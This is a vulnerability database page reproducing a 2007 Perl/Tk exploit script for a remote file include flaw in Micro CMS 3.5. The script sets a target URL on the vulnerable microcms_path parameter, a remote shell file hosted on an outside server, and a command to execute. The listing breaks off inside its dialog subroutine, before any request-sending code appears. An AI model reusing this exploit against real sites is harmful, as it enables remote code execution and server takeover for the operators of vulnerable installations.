Lucene search
K

Micro CMS <= 3.5 Remote File Include Exploit

🗓️ 14 Jan 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 34 Views

Micro CMS <= 3.5 Remote File Include Exploi

Code

                                                #!/usr/bin/perl

Script: Micro CMS 3.5
site: http://www.impliedbydesign.com/apps/microcms/microcms.zip

Coded By : ilker Kandemir &lt;ilkerkandemir[at]mynet.com&gt;


use Tk;
use Tk::DialogBox;
use LWP::UserAgent;


$mw = new MainWindow(title =&gt; &quot;AYYILDIZ.ORG :: Micro CMS &lt;= 3.5  Remote File Include Exploit &quot; );

$mw-&gt;geometry ( '500x300' ) ;
$mw-&gt;resizable(0,0);


$mw-&gt;Label(-text =&gt; 'Micro CMS &lt;= 3.5 (show_hlp.php) Remote File Include Exploit', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'blue')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

$url = 'http://www.site.com/[Micro-CMS_PATH]/micro_cms_files/microcms-include.php?microcms_path=';
$shell_path = 'http://site_server/shell.txt?';
$cmd = 'ls -la';


$fleft-&gt;Label ( -text =&gt; 'Script Path: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; &quot;groove&quot;, -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Shell Path: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; &quot;groove&quot;, -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$shell_path) -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'CMD: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; &quot;groove&quot;, -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$cmd) -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();



$fright-&gt;Button(-text    =&gt; 'Exploit Include Vulnerability',
                -relief =&gt; &quot;groove&quot;,
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&amp;akcja
               )-&gt;pack();


$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Exploit coded by ilker Kandemir', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'AYYILDIZ TEAM', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'http://www.ayyildiz.org/', -font =&gt; '{Verdana} 7')-&gt;pack();


MainLoop();


sub akcja()
{

$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'AYYILDIZ TEAM  Exploit by ilker kandemir ', -buttons =&gt; [&quot;OK&quot;]);
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'http://www.ayyildiz.org/', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Greetz For my friends ', -font =&gt; '{Verdana} 6')-&gt;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1
34